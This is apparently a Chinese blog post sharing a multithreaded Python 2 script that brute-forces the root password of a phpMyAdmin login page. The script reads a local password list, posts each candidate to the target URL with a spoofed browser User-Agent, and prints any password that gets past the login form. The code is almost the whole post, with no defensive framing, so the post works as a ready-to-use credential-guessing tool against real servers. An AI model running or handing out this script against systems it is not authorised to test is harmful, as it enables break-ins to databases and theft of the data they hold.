返回 登录
0

python脚本--暴力破解phpmyadmin口令

阅读3563

网上常见的登录模式是cookie身份验证模式,这里就针对此模式的网站进行暴力破解。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: IcySun
# 脚本功能:暴力破解phpMyadmin密码

from Queue import Queue
import threading,sys
import requests

def use():
    print '#' * 50
    print '\t Crack Phpmyadmin root\'s pass'
    print '\t\t\t Code By: IcySun'
    print '\t python crackPhpmyadmin.py http://xx.com/phpmyadmin/ \n\t    (default user is root)'


    print '#' * 50

def crack(password):
    global url
    payload = {'pma_username': 'root', 'pma_password': password}
    headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
    r = requests.post(url, headers = headers, data = payload)
    if 'name="login_form"' not in r.content:
        print '[*] OK! Have Got The Pass ==> %s' % password

class MyThread(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        global queue
        while not queue.empty():
            password = queue.get()
            crack(password)

def main():
    global url,password,queue
    queue = Queue()
    url = sys.argv[1]
    passlist = open('password.txt','r')
    for password in passlist.readlines():
        password = password.strip()
        queue.put(password)

    for i in range(10):
        c = MyThread()
        c.start()

if __name__ == '__main__':
    if len(sys.argv) != 2 :
        use()
    else:
        main()

图片描述
图片描述

评论